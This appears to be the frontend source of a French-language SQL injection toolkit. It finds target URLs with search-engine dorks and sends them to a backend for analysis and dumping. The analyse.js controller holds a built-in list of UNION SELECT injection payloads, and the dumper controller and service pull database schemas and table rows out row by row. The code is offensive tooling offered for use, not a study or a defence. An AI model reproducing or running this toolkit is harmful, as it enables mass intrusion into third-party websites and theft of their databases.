c=this,d=c.opts,f=c.el=a(null,{className:d.className});if(e(f,{position:d.position,width:0,zIndex:d.zIndex,left:d.left,top:d.top}),b&&b.insertBefore(f,b.firstChild||null),f.setAttribute("role","progressbar"),c.lines(f,c.opts),!j){var g,h=0,i=(d.lines-1)*(1-d.direction)/2,k=d.fps,l=k/d.speed,m=(1-d.opacity)/(l*d.trail/100),n=l/d.lines;!function o(){h++;for(var a=0;a<d.lines;a++)g=Math.max(1-(h+(d.lines-a)*n)%l*m,d.opacity),c.opacity(f,a*d.direction+i,g,d);c.timeout=c.el&&setTimeout(o,~~(1e3/k))}()}return c},stop:function(){var a=this.el;return a&&(clearTimeout(this.timeout),a.parentNode&&a.parentNode.removeChild(a),this.el=void 0),this},lines:function(d,f){function h(b,c){return e(a(),{position:"absolute",width:f.scale*(f.length+f.width)+"px",height:f.scale*f.width+"px",background:b,boxShadow:c,transformOrigin:"left",transform:"rotate("+~~(360/f.lines*k+f.rotate)+"deg) translate("+f.scale*f.radius+"px,0)",borderRadius:(f.corners*f.scale*f.width>>1)+"px"})}for(var i,k=0,l=(f.lines-1)*(1-f.direction)/2;k<f.lines;k++)i=e(a(),{position:"absolute",top:1+~(f.scale*f.width/2)+"px",transform:f.hwaccel?"translate3d(0,0,0)":"",opacity:f.opacity,animation:j&&c(f.opacity,f.trail,l+k*f.direction,f.lines)+" "+1/f.speed+"s linear infinite"}),f.shadow&&b(i,e(h("#000","0 0 4px #000"),{top:"2px"})),b(d,b(i,h(g(f.color,k),"0 0 1px rgba(0,0,0,.1)")));return d},opacity:function(a,b,c){b<a.childNodes.length&&(a.childNodes[b].style.opacity=c)}}),"undefined"!=typeof document){k=function(){var c=a("style",{type:"text/css"});return b(document.getElementsByTagName("head")[0],c),c.sheet||c.styleSheet}();var o=e(a("group"),{behavior:"url(#default#VML)"});!d(o,"transform")&&o.adj?i():j=d(o,"animation")}return h});


--------------------------------------------------------------------------------
/app/js/assets/treeview.js:
--------------------------------------------------------------------------------
  1 | /*
  2 |  QUADCORE ENGINEERING MSB
  3 | */
  4 | (function($){
  5 |   var checkedNode = [];
  6 | 
  7 |     $.fn.extend({
  8 |         load : function(data){
  9 |           var genDiagram = function (obj)
 10 |           {
 11 |             var createUl = function (obj, name_first)
 12 |             {
 13 |               var h = '';
 14 |               h += '<li><label><input type="checkbox" />' + name_first + '</label>';
 15 |               $.each(obj, function(key, value) {
 16 |                  h += '<ul>';
 17 |                  $.each(value, function(k, v) {
 18 |                    h += '<li><label><input type="checkbox" />' + k + '</label>';
 19 |                    $.each(v, function(a, b) {
 20 |                       h += '<ul>';
 21 |                       $.each(value, function(k, v) {
 22 |                          h += '<li><label><input type="checkbox" />' + a + '</label></li>';
 23 |                       })
 24 |                       h += '</ul>';
 25 |                    })
 26 |                    h += '</li>';
 27 |                  })
 28 |                  h += '</ul>';
 29 |               })
 30 |               h += '</li>';
 31 |               return h;
 32 |             }
 33 | 
 34 |             var globale = '';
 35 |             $.each(data, function(key, value) {
 36 |               globale += createUl(value, key);
 37 |             })
 38 |             checkedNode = [];
 39 |             $('.tree').empty();
 40 |             $('.tree').append(globale);
 41 |           }
 42 |           genDiagram(data);
 43 |         },
 44 | 
 45 |         getCheckedPath: function(){
 46 |           return checkedNode;
 47 |         },
 48 | 
 49 |         clearCheckedPath: function(){
 50 |           return checkedNode = [];
 51 |         },
 52 | 
 53 |         treeview: function(){
 54 |             $(this)
 55 |                 .addClass('checktree-root')
 56 |                 .on('change', 'input[type="checkbox"]', function(e){
 57 |                     e.stopPropagation();
 58 |                     e.preventDefault();
 59 | 
 60 |                     checkParents($(this));
 61 |                     checkChildren($(this));
 62 |                     pathChecked($(this));
 63 |                 });
 64 |             var pathChecked = function (c)
 65 |             {
 66 |               var getPath = function (c)
 67 |               {
 68 |                 var path = [];
 69 |                 var getName = function (c)
 70 |                 {
 71 |                   rootCheckbox = c.find('label:eq(0)');
 72 |                   return rootCheckbox.text();
 73 |                 }
 74 | 
 75 |                 path.push(c.parent().text());
 76 |                 var parentLi = c.parents('ul:eq(0)').parents('li:eq(0)');
 77 |                 if (parentLi.length)
 78 |                 {
 79 |                   path.push(getName(parentLi));
 80 |                   parentLi = parentLi.parents('ul:eq(0)').parents('li:eq(0)');
 81 |                   if (parentLi.length) {
 82 |                     path.push(getName(parentLi));
 83 |                     parentLi = parentLi.parents('ul:eq(0)').parents('li:eq(0)');
 84 |                     if (parentLi.length) {
 85 |                       path.push(getName(parentLi));
 86 |                     }
 87 |                   }
 88 |                 }
 89 |                 path.reverse();
 90 |                 return path.join('/');
 91 |               }
 92 | 
 93 |               if (c.is(':checked')){
 94 |                 checkedNode.push(getPath(c));
 95 |               } else{
 96 |                 var index = checkedNode.indexOf(getPath(c));
 97 |                 if (index > -1) {
 98 |                     checkedNode.splice(index, 1);
 99 |                 }
100 |               }
101 | 
102 |             }
103 | 
104 | 
105 |             var checkParents = function (c)
106 |             {
107 |                 var parentLi = c.parents('ul:eq(0)').parents('li:eq(0)');
108 | 
109 |                 if (parentLi.length)
110 |                 {
111 |                     var siblingsChecked = parseInt($('input[type="checkbox"]:checked', c.parents('ul:eq(0)')).length),
112 |                         rootCheckbox = parentLi.find('input[type="checkbox"]:eq(0)');
113 | 
114 |                     if (c.is(':checked')){
115 |                         rootCheckbox.prop('checked', true)
116 |                     } /*else if (siblingsChecked === 0) {
117 |                         rootCheckbox.prop('checked', false);
118 |                     }*/
119 | 
120 |                     checkParents(rootCheckbox);
121 |                 }
122 |             }
123 | 
124 |             var checkChildren = function (c)
125 |             {
126 |                 var childLi = $('ul li input[type="checkbox"]', c.parents('li:eq(0)'));
127 | 
128 |                 if (childLi.length){
129 |                     childLi.prop('checked', c.is(':checked'));
130 |                 }
131 |             }
132 |         }
133 | 
134 |     });
135 | })(jQuery);
136 | 


--------------------------------------------------------------------------------
/app/js/controller/analyse.js:
--------------------------------------------------------------------------------
  1 | /*
  2 |  QUADCORE ENGINEERING MSB
  3 | */
  4 | app.controller('AnalyseCtrl', function($scope, AnalyseService, usSpinnerService) {
  5 | 
  6 | 	$scope.cancel = false;
  7 | 	$scope.loading = function(state, id){
  8 | 		if (id == null) { id = 1; }
  9 | 	    if (state) {
 10 | 			$scope.cancel = false;
 11 | 	      	usSpinnerService.spin('spinner-' + id);
 12 | 	    } else {
 13 | 	      	usSpinnerService.stop('spinner-' + id);
 14 | 	    }
 15 |   	}
 16 |   	$scope.setCancel = function(state) {
 17 | 		$scope.cancel = state;
 18 | 		//setTimeout(function(){ $scope.cancel = false; }, 3000);
 19 | 	}
 20 | 	$scope.analyse = {
 21 | 		url_point : '',
 22 | 		union_style :   "999999.9 union all select [t]" + "\r\n" +
 23 | 			            "999999.9 union all select [t]--" + "\r\n" +
 24 | 			            "999999.9' union all select [t] and '0'='0" +
 25 | 			            "999999.9\" union all select [t] and \"0\"=\"0" + "\r\n" +
 26 | 			            "999999.9) union all select [t] and (0=0" +
 27 | 			            "999999.9' and [t] '1'=1" + "\r\n" +
 28 | 			            "999999.9' or 1=[t] and '1'=1" + "\r\n" +
 29 | 			            "999999.9 union all select [t] #" + "\r\n" +
 30 | 			            "999999.9 union all select [t]-- #" + "\r\n" +
 31 | 			            "999999.9\" union all select [t] and \"0\"=\"0 #" + "\r\n" +
 32 | 			            "999999.9' union all select [t] and '0'='0 #" + "\r\n" +
 33 | 			            "999999.9) union all select [t] and (0=0) #" + "\r\n",
 34 | 		data : ''
 35 | 	};
 36 | 
 37 | 	$scope.start = function() {
 38 | 		$scope.loading(true, 1);
 39 | 		if($scope.analyse.url_point){
 40 | 			$scope.analyse.url_point = $scope.analyse.url_point.replace(/\s/g, '+');
 41 | 
 42 | 			if($scope.analyse.url_point.indexOf("http") > -1 && $scope.analyse.url_point.indexOf("=") > -1) {
 43 | 				if($scope.analyse.union_style) {
 44 | 
 45 | 					var unions = $scope.analyse.union_style.split("\r\n");
 46 | 					var keepGoing = true;
 47 | 
 48 | 					angular.forEach(unions, function(union) {
 49 | 						$scope.loading(true, 1);
 50 | 					    if(keepGoing) {
 51 | 							if (union != '') {
 52 | 								var semaphore = false;
 53 | 
 54 | 								if (startUnion($scope.analyse.url_point, union))
 55 | 								{
 56 | 									keepGoing = false; //== >break
 57 | 									semaphore = true;
 58 | 								} else{
 59 | 									semaphore = true;
 60 | 								}
 61 | 
 62 | 								while (!semaphore) {
 63 | 									// We're just waiting.
 64 | 								}
 65 | 							}
 66 | 						}
 67 | 					});
 68 | 
 69 | 				} else {
 70 | 					alert("Veuillez entrer des union a testé");
 71 | 				}
 72 | 			} else {
 73 | 				alert("Le format de l'url ciblé est incorrecte.");
 74 | 			}
 75 | 		} else{
 76 | 			alert("Veuillez renseigner l'url ciblé.");
 77 | 		}
 78 | 		$scope.loading(false, 1);
 79 | 	}
 80 | 
 81 | 	function startUnion(url_point, union) {
 82 | 		$scope.data_response = AnalyseService.reqAnalyse(url_point, union).then(function(data_response) {
 83 | 			$scope.data_response = data_response;
 84 | 
 85 | 			$scope.analyse.data = $scope.analyse.data + "\r\n" + $scope.data_response.result.data;
 86 | 
 87 | 			console.log($scope.data_response);
 88 | 
 89 | 			if ($scope.data_response.result.found == true) {
 90 | 				return true;
 91 | 			} else {
 92 | 				return false;
 93 | 			}
 94 | 		}, function(msg){
 95 | 			alert(msg);
 96 | 			$scope.loading(false, 1);
 97 | 		});
 98 | 	}
 99 | 
100 | });
101 | 


--------------------------------------------------------------------------------
/app/js/controller/dumper.js:
--------------------------------------------------------------------------------
  1 | /*
  2 |  QUADCORE ENGINEERING MSB
  3 | */
  4 | app.controller('DumperCtrl', function($scope, DumperService, usSpinnerService, $cookies) {
  5 | 
  6 | 	var intervalIds = [];
  7 | 	$scope.workspaces = [  {
  8 | 			name : '',
  9 | 			name_rows : [],
 10 | 			data_rows : []
 11 | 		}
 12 | 	];
 13 | 	$scope.dumper = {
 14 | 		url_point : '',
 15 | 		diagram : {}
 16 | 	};
 17 | 	$scope.currentWorkspace = null;
 18 | 	$scope.cancel = true;
 19 | 
 20 | 	function restore() {
 21 | 		if ($cookies.getObject('dumper')) {
 22 | 			$scope.dumper = $cookies.getObject('dumper');
 23 | 		} if ($cookies.getObject('currentWorkspace')) {
 24 | 			$scope.currentWorkspace = $cookies.getObject('currentWorkspace');
 25 | 		}
 26 | 	}
 27 | 	restore();
 28 | 	function save() {
 29 | 		$cookies.putObject('dumper', $scope.dumper, { expires: '2020'});
 30 | 		//$cookies.putObject('workspaces', $scope.workspaces, { expires: '2020'});
 31 | 		$cookies.putObject('currentWorkspace', $scope.currentWorkspace, { expires: '2020'});
 32 | 	}
 33 | 
 34 | 	$scope.loading = function(state, id){
 35 | 		if (id == null) { id = 2; }
 36 | 	    if (state) {
 37 | 			$scope.cancel = false;
 38 | 	      	usSpinnerService.spin('spinner-' + id);
 39 | 	    } else {
 40 | 	      	usSpinnerService.stop('spinner-' + id);
 41 | 	    }
 42 |   	}
 43 |   	$scope.setCancel = function(state) {
 44 | 		$scope.cancel = state;
 45 | 		for (var i=0; i < intervalIds.length; i++) {
 46 | 	        clearInterval(intervalIds[i]);
 47 | 	    }
 48 | 	}
 49 | 
 50 | 	$scope.instance = {
 51 | 		name_dump : null,
 52 | 		row_count : null,
 53 | 		infos : null
 54 | 	};
 55 | 
 56 | 	$scope.start = function() {
 57 | 		if($scope.dumper.url_point){
 58 | 			$scope.dumper.url_point = $scope.dumper.url_point.replace(/\s/g, '+');
 59 | 
 60 | 			if($scope.dumper.url_point.indexOf("http") > -1 && $scope.dumper.url_point.indexOf("[t]") > -1){
 61 | 				$scope.loading(true, 1);
 62 | 
 63 | 				DumperService.startDump($scope.dumper.url_point).then(function(data_response){
 64 | 					$scope.data_response = data_response;
 65 | 
 66 | 					if (data_response.success) {
 67 | 						$('.tree').clearCheckedPath();
 68 | 					} else {
 69 | 						if (data_response.message) {
 70 | 							alert(data_response.message);
 71 | 						}
 72 | 					}
 73 | 					if (data_response) {
 74 | 						$scope.dumper = data_response;
 75 | 						$cookies.putObject('dumper', data_response, { expires: '2020'});
 76 | 					}
 77 | 
 78 | 					$scope.loading(false, 1);
 79 | 
 80 | 				}, function(msg){
 81 | 					alert(msg);
 82 | 					$scope.loading(false, 1);
 83 | 				});
 84 | 
 85 | 			} else {
 86 | 				alert("Le format de l'url ciblé est incorrecte.");
 87 | 			}
 88 | 		}else{
 89 | 			alert("Veuillez renseigner l'url ciblé.");
 90 | 		}
 91 |   	}
 92 | 
 93 | 	$scope.getDiagramMore = function(obj) {
 94 | 		$scope.loading(true, 2);
 95 | 		var stringDiagram = angular.toJson($scope.dumper.diagram);
 96 | 
 97 | 		DumperService.getDiagram($scope.dumper.url_point, obj, stringDiagram).then(function(data_response){
 98 | 			$scope.data_response = data_response;
 99 | 
100 | 			if (data_response.success) {
101 | 				if(typeof(data_response.diagram) != "undefined" && data_response.diagram !== null) {
102 | 					$scope.dumper.diagram = data_response.diagram;
103 | 					$cookies.putObject('dumper', $scope.dumper, { expires: '2020'});
104 | 				}
105 | 			} else {
106 | 				if (data_response.message) {
107 | 					alert(data_response.message);
108 | 				}
109 | 			}
110 | 
111 | 			$scope.loading(false, 2);
112 | 
113 | 		}, function(msg){
114 | 			alert(msg);
115 | 		});
116 | 	}
117 | 
118 | 	$scope.getDumpData = function() {
119 | 		$scope.loading(true, 1);
120 | 		var stringDiagram = angular.toJson($scope.dumper.diagram);
121 | 
122 | 		if ($scope.workspaces[0]) {
123 | 			$scope.workspaces.push( $scope.workspaces[0] );
124 | 			$scope.workspaces[0] = {
125 | 				name : '',
126 | 				name_rows : [],
127 | 				data_rows : []
128 | 			};
129 | 		}
130 | 
131 | 		DumperService.getStartDumperData($scope.dumper.url_point, stringDiagram).then(function(data_response){
132 | 			$scope.data_response = data_response;
133 | 
134 | 			if (data_response.success) {
135 | 				$scope.data_response = data_response;
136 | 				$scope.instance.name_dump = data_response.name_dump;
137 | 				$scope.instance.row_count = data_response.row_count;
138 | 				$scope.instance.infos = data_response.infos;
139 | 
140 | 				var dd = {
141 | 					name : data_response.name_dump,
142 | 					name_rows : data_response.infos.colonnes.split(','),
143 | 					row_count: 0,
144 | 					data_rows : []
145 | 				};
146 | 				$scope.workspaces[0] = dd;
147 | 				$scope.changeCurrentWorkspace( $scope.workspaces[0] );
148 | 				setInterval(refreshDGV(), 1000);
149 | 
150 | 				if ($scope.instance.infos != null) {
151 | 					var instance = JSON.stringify($scope.instance.infos);
152 | 					$scope.dump_row = $scope.workspaces[0].row_count = $scope.instance.row_count;
153 | 
154 | 					for (var i = 0; i < $scope.dump_row; i++) {
155 | 
156 | 						DumperService.dumpRow($scope.dumper.url_point, instance, i).then(function(data_response){
157 | 							if (data_response.row) {
158 | 								$scope.workspaces[0].data_rows.push(data_response.row);
159 | 							}
160 | 						}, function(msg){
161 | 							alert('Row: ' + i + ' ' + msg);
162 | 						});
163 | 
164 | 						if ($scope.cancel == true){
165 | 							alert('Cancel => i => ' + i);
166 | 		               		break;
167 | 			            }
168 | 
169 | 					};
170 | 
171 | 					$scope.loading(false, 3);
172 | 				}
173 | 				save();
174 | 
175 | 			} else {
176 | 				if (data_response.message) {
177 | 					alert(data_response.message);
178 | 				}
179 | 			}
180 | 			$scope.loading(false, 1);
181 | 
182 | 		}, function(msg){
183 | 			alert(msg);
184 | 			$scope.loading(false, 1);
185 | 		});
186 | 
187 | 	}
188 | 
189 | 	function dmpRow(instance, i) {
190 | 		$scope.data_ = DumperService.dumpRow($scope.dumper.url_point, instance, i).then(function(data_response){
191 | 			if (data_response.row) {
192 | 				$scope.workspaces[0].data_rows.push(data_response.row);
193 | 			}
194 | 		}, function(msg){
195 | 			alert('Row: ' + i + ' ' + msg);
196 | 		});
197 | 		return true;
198 | 	}
199 | 
200 |     function refreshDGV() {
201 | 		$scope.workspaces.forEach(function (wk, index) {
202 | 
203 | 	        var colData = { workspace: wk.name };
204 | 	        var columns = buildColumns(wk.name_rows);
205 | 
206 | 	        wk.bsTableControl = {
207 | 	            options: {
208 | 	                data: wk.data_rows,
209 | 	                rowStyle: function (row, index) {
210 | 	                    return { classes: 'none' };
211 | 	                },
212 | 	                height: 400,
213 | 	                cache: true,
214 | 	                striped: true,
215 | 	                pagination: true,
216 | 	                pageSize: 100,
217 | 	                pageList: [5, 10, 25, 50, 100, 200, 300, 500],
218 | 	                search: true,
219 | 	                showColumns: true,
220 | 	                showRefresh: true,
221 | 	                showExport: true,
222 | 	                exportDataType: 'all',
223 | 	                minimumCountColumns: 2,
224 | 	                clickToSelect: false,
225 | 	                showToggle: true,
226 | 	                maintainSelected: true,
227 | 	                mobileResponsive: true,
228 | 	                minHeight: 500,
229 | 	                cookie: true,
230 | 	                cookieIdTable: 'DTI-' + wk.name,
231 | 	                cookieExpire: '1y',
232 | 	                columns: columns
233 | 	            }
234 | 	        };
235 | 
236 | 	    });
237 | 	}
238 |     refreshDGV();
239 | 
240 |     $scope.changeCurrentWorkspace = function (wk) {
241 |         $scope.currentWorkspace = wk;
242 |     };
243 | 
244 |     $scope.deleteWk = function(wk) {
245 |     	if (confirm('Remove ' + wk.name + ' work space ?')) {
246 | 	    	var index = $scope.workspaces.indexOf(wk);
247 | 	    	if (index > -1) {
248 | 			    $scope.workspaces.splice(index, 1);
249 | 			}
250 | 			$scope.currentWorkspace = $scope.workspaces[index - 1];
251 | 			save();
252 | 		}
253 |     };
254 | 
255 |     function buildColumns(name_columns) {
256 |     	var formColumns = [];
257 | 
258 |     	name_columns.forEach(function (k, v) {
259 |     		formColumns.push({
260 | 	            field: k,
261 | 	            title: k,
262 | 	            align: 'center',
263 | 	            valign: 'middle',
264 | 	            sortable: true
265 | 	        })
266 | 	    });
267 | 
268 |         return formColumns;
269 |     }
270 | 
271 | });
272 | 
273 | /*var checkedPathJson = JSON.stringify($('.tree').getCheckedPath());*/
274 | 


--------------------------------------------------------------------------------
/app/js/controller/main.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  QUADCORE ENGINEERING MSB
 3 | */
 4 | app.controller('MainController', function($scope, $location, MainService) {
 5 | 
 6 | 	$scope.loading = true;
 7 | 	$scope.tabs = [
 8 | 		{ value: "search", label: 'Recherche' },
 9 | 		/*{ value: "scanne", label: 'Scanne' },*/
10 | 		{ value: "analyse", label: 'Analyse URL' },
11 | 		{ value: "dumper", label: 'Dumper' },
12 | 	];
13 | 
14 | 	$scope.dossierCourant = null;
15 | 
16 | 	$scope.selectionDossier = function(dossier) {
17 | 		$scope.dossierCourant = dossier;
18 | 	}
19 | 
20 | 	$scope.$watch(function() {
21 | 		return $location.path();
22 | 	}, function(newPath) {
23 | 		var tabPath = newPath.split("/")
24 | 		if (tabPath.length > 1) {
25 | 			var valDossier = tabPath[1];
26 | 			if (valDossier != '') {
27 | 				$scope.tabs.forEach(function(item) {
28 | 					if (item.value == valDossier) {
29 | 						$scope.selectionDossier(item);
30 | 					}
31 | 				});
32 | 				/*if ($scope.dossierCourant == null) {
33 | 					window.href = '#dumper';
34 | 				}*/
35 | 			} else {
36 | 				//window.href = '#dumper';
37 | 			}
38 | 		}
39 | 	});
40 | 
41 | 
42 | });
43 | 


--------------------------------------------------------------------------------
/app/js/controller/recherche.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  QUADCORE ENGINEERING MSB
 3 | */
 4 | app.controller('RechercheCtrl', function($scope, RechercheService, usSpinnerService) {
 5 | 
 6 |   $scope.loading = function(state){
 7 |     if (state) {
 8 |       usSpinnerService.spin('spinner-1');
 9 |     } else {
10 |       usSpinnerService.stop('spinner-1');
11 |     }
12 |   }
13 |   $scope.urls = {};
14 | 	$scope.recherche = {
15 | 	  dorks: 'page.php?id=',
16 | 	  page: 1,
17 | 	  chk_google: true
18 |   };
19 | 
20 | 	$scope.startRecherche = function() {
21 |     var moteur = "";
22 |     var erreur = 0;
23 | 
24 |     if(!$scope.recherche.dorks){
25 |         alert("Veuillez remplir le champ dork !");
26 |         erreur++;
27 |     } if(!$scope.recherche.page && erreur == 0){
28 |         alert("Veuillez remplir un nombre de page !");
29 |         erreur++;
30 |     } if(!$scope.recherche.chk_google && !$scope.recherche.chk_bing && !$scope.recherche.chk_yahoo){
31 |         alert("Veuillez choisir un moteur de recheche !");
32 |         erreur++;
33 |     }
34 | 
35 |     if(erreur == 0){
36 |         if($scope.recherche.chk_google){
37 |             moteur += "google;";
38 |         } if($scope.recherche.chk_bing){
39 |             moteur += "bing;";
40 |         } if($scope.chk_yahoo){
41 |             moteur += "yahoo;";
42 |         }
43 | 
44 |         if(moteur != ""){
45 |           $scope.recherche.moteur = moteur;
46 |           $scope.loading(true);
47 | 
48 |           for (var i = 0; i < $scope.recherche.page; i++) {
49 |             RechercheService.postRecherche($scope.recherche, $scope.urls).then(function(data_response){
50 |               $scope.data_response = data_response;
51 |               if (data_response.success) {
52 |                 $scope.urls = data_response.urls;
53 |               } else {
54 |                 if (data_response.message) {
55 |                   alert(data_response.message);
56 |                 } else {
57 |                   alert(data_response);
58 |                 }
59 |               }
60 |               $scope.loading(false);
61 |             }, function(msg){
62 |               alert(msg);
63 |               $scope.loading(false);
64 |             });
65 |             setTimeout(1000);
66 |           }
67 | 
68 |         } else {
69 |           alert("Veuillez sélectionnez un moteur de recherche.");
70 |         }
71 |     }
72 |   }
73 | 
74 |   $scope.clear = function() {
75 |     $scope.urls = RechercheService.getUrls().then(function(urls){
76 |         $scope.loading(false);
77 |         $scope.urls = urls;
78 |     }, function(msg){
79 |         alert(msg);
80 |     });
81 |   }
82 | 
83 |   $scope.export = function() {
84 |     var root_folder = '/' +  window.location.href.split('/')[3];
85 |     window.location.href = root_folder + '/recherche/exporte';
86 |   }
87 | 
88 | });
89 | 


--------------------------------------------------------------------------------
/app/js/service/analyse.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  QUADCORE ENGINEERING MSB
 3 | */
 4 | app.service('AnalyseService', function($http, $q, $timeout) {
 5 | 	var root_folder = '/' +  window.location.href.split('/')[3];
 6 | 	var config = {
 7 |       headers : {
 8 |           'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8;'
 9 |       }
10 | 	}
11 | 
12 | 	var factory = {
13 | 		data_post: false,
14 | 
15 | 		reqAnalyse : function(url_point, union){
16 | 			var deferred = $q.defer();
17 | 			var dataPost = $.param({
18 | 				url_point : url_point,
19 | 				union : union
20 |  		 	});
21 | 
22 | 			$http.post(root_folder + '/analyse/start', dataPost, config)
23 | 			.success(function(data, status){
24 | 				factory.data_post = data;
25 | 				$timeout(function(){
26 | 					deferred.resolve(factory.data_post);
27 | 				}, 19999)
28 | 			}).error(function(data, status){
29 | 				deferred.reject('Impossible de démarrer le dump');
30 | 			});
31 | 
32 | 			return deferred.promise;
33 | 		}
34 | 
35 | 	};
36 | 	return factory;
37 | 
38 | });
39 | 


--------------------------------------------------------------------------------
/app/js/service/dumper.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  QUADCORE ENGINEERING MSB
 3 | */
 4 | app.service('DumperService', function($http, $q, $timeout) {
 5 | 	var root_folder = '/' +  window.location.href.split('/')[3];
 6 | 	var config = {
 7 |       headers : {
 8 |           'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8;'
 9 |       }
10 | 	}
11 | 
12 | 	var factory = {
13 | 		data_post: false,
14 | 		data_post_diagram: false,
15 | 
16 | 		startDump : function(url_point){
17 | 			var deferred = $q.defer();
18 | 			var dataPost = $.param({
19 | 				url_point : url_point,
20 |  		 	});
21 | 			$http.post(root_folder + '/dumper/start', dataPost, config)
22 | 			.success(function(data, status){
23 | 				factory.data_post = data;
24 | 				$timeout(function(){
25 | 					deferred.resolve(factory.data_post);
26 | 				}, 2000)
27 | 			}).error(function(data, status){
28 | 				deferred.reject('Impossible de démarrer le dump');
29 | 			});
30 | 
31 | 			return deferred.promise;
32 | 		},
33 | 
34 | 		getDiagram : function(url_point, object, diagram){
35 | 			var deferred = $q.defer();
36 | 			var dataPost = $.param({
37 | 				url_point : url_point,
38 | 				object : object,
39 | 				diagram : diagram
40 |  		 	});
41 | 
42 | 			$http.post(root_folder + '/dumper/get_diagram', dataPost, config)
43 | 			.success(function(data, status){
44 | 				factory.data_post_diagram = data;
45 | 				$timeout(function(){
46 | 					deferred.resolve(factory.data_post_diagram);
47 | 				}, 2000)
48 | 			}).error(function(data, status){
49 | 				deferred.reject('Impossible d\'éxecuté l\'action');
50 | 			});
51 | 
52 | 			return deferred.promise;
53 | 		},
54 | 
55 | 		getStartDumperData : function(url_point, diagram){
56 | 			var deferred = $q.defer();
57 | 			var dataPost = $.param({
58 | 				url_point : url_point,
59 | 				diagram : diagram
60 |  		 	});
61 | 			$http.post(root_folder + '/dumper/get_initDump', dataPost, config)
62 | 			.success(function(data, status){
63 | 				factory.data_post = data;
64 | 				$timeout(function(){
65 | 					deferred.resolve(factory.data_post);
66 | 				}, 5000)
67 | 			}).error(function(data, status){
68 | 				deferred.reject('Erreur Impossible de récuperer les données du dump');
69 | 			});
70 | 
71 | 			return deferred.promise;
72 | 		},
73 | 
74 | 		dumpRow : function(url_point, instance, row_nbr){
75 | 			var deferred = $q.defer();
76 | 			var dataPost = $.param({
77 | 				url_point : url_point,
78 | 				infos : instance,
79 | 				row : row_nbr,
80 |  		 	});
81 | 			$http.post(root_folder + '/dumper/get_row', dataPost, config)
82 | 			.success(function(data, status){
83 | 				factory.data_post = data;
84 | 				$timeout(function(){
85 | 					deferred.resolve(factory.data_post);
86 | 				}, 5000)
87 | 			}).error(function(data, status){
88 | 				deferred.reject('Erreur Impossible de récuperer la ligne de données du dump.');
89 | 			});
90 | 
91 | 			return deferred.promise;
92 | 		},
93 | 
94 | 	};
95 | 
96 | 	return factory;
97 | 
98 | });
99 | 


--------------------------------------------------------------------------------
/app/js/service/main.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  QUADCORE ENGINEERING MSB
 3 | */
 4 | app.service('MainService', function($http, $q, $timeout) {
 5 | 
 6 | 	var factory = {
 7 | 
 8 | 
 9 | 	};
10 | 	return factory;
11 | });
12 | 


--------------------------------------------------------------------------------
/app/js/service/recherche.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  QUADCORE ENGINEERING MSB
 3 | */
 4 | app.service('RechercheService', function($http, $q, $timeout) {
 5 | 	var root_folder = '/' +  window.location.href.split('/')[3];
 6 | 	var config = {
 7 |         headers : {
 8 |             'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8;'
 9 |         }
10 |     };
11 | 
12 | 	var factory = {
13 | 		urls : false,
14 | 		data_post : false,
15 | 
16 | 		getUrls : function(){
17 | 			var deferred = $q.defer();
18 | 			if (factory.urls !== false) {
19 | 				deferred.resolve(factory.urls);
20 | 			}else{
21 | 				$http.get(root_folder + '/recherche/get')
22 | 					.success(function(data, status){
23 | 						factory.urls = data.urls;
24 | 						$timeout(function(){
25 | 							deferred.resolve(factory.urls);
26 | 						}, 2000)
27 | 					}).error(function(data, status){
28 | 						deferred.reject('Impossible de recuperer les urls');
29 | 					});
30 | 			}
31 | 			return deferred.promise;
32 | 		},
33 | 
34 | 		postRecherche : function(recherheObj, urls){
35 | 			var deferred = $q.defer();
36 | 			var dataPost = $.param({
37 | 				dorks : recherheObj.dorks,
38 | 				engines : recherheObj.moteur,
39 | 				urls : urls
40 | 	        });
41 | 
42 | 			$http.post(root_folder + '/recherche/start', dataPost, config)
43 | 			.success(function(data, status){
44 | 				factory.data_post = data;
45 | 				$timeout(function(){
46 | 					deferred.resolve(factory.data_post);
47 | 				}, 2000)
48 | 			}).error(function(data, status){
49 | 				deferred.reject('Erreur une requete de recherche a échouer.');
50 | 			});
51 | 
52 | 			return deferred.promise;
53 | 		},
54 | 
55 | 		clearUrls : function(){
56 | 			var deferred = $q.defer();
57 | 			$http.get(root_folder + '/recherche/clear')
58 | 				.success(function(data, status){
59 | 					$timeout(function(){
60 | 						deferred.resolve(data);
61 | 					}, 2000)
62 | 				}).error(function(data, status){
63 | 					deferred.reject('Impossible d\'éxecuter l\'action');
64 | 				});
65 | 			return deferred.promise;
66 | 		},
67 | 
68 | 	};
69 | 	return factory;
70 | 
71 | });
72 | 


--------------------------------------------------------------------------------
/app/main.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 	session_start();
 3 | 	ini_set('max_execution_time', 300);
 4 | 	set_time_limit(0);
 5 | 	date_default_timezone_set('Europe/Paris');
 6 | 
 7 | 	define('WEBROOT', dirname(__FILE__));
 8 | 	define('ROOT', dirname(WEBROOT));
 9 | 	define('DS', DIRECTORY_SEPARATOR);
10 | 	define('APP', ROOT.DS.'app');
11 | 	define('CORE', ROOT.DS.'core');
12 | 	define('REQU', ROOT.DS.'request');
13 | 	define('BASE_URL', dirname(dirname($_SERVER['SCRIPT_NAME'])));
14 | 
15 | 	require CORE.DS.'Includer.php';
16 | 
17 | 	new Dispatcher();
18 | 


--------------------------------------------------------------------------------
/app/partials/analyse.html:
--------------------------------------------------------------------------------
 1 | <div class="container spacer">
 2 | <span us-spinner spinner-key="spinner-1"></span>
 3 |   <div class="row">
 4 | 
 5 |     <div class="col-md-12 col-sm-12 col-xs-12">
 6 |       <label>URL:</label>
 7 |         <input type="text" ng-model="analyse.url_point" class="form-control" placeholder="http://site.com/page.php?id=123">
 8 |     </div>
 9 | 
10 |     <div class="col-md-6 col-sm-8 col-xs-12 spacer">
11 |       <div class="form-group">
12 |         <label>Union styles:</label>
13 |         <textarea class="form-control" ng-model="analyse.union_style" rows="15" cols="" placeholder="999999.9 union all select [t]"></textarea>
14 |       </div>
15 | 
16 |     </div>
17 | 
18 |     <div class="col-md-6 col-sm-4 col-xs-12">
19 |       <br>
20 |         <div class="form-group">
21 |             <button class="btn btn-success btn-lg" ng-click="start()">Start</button>
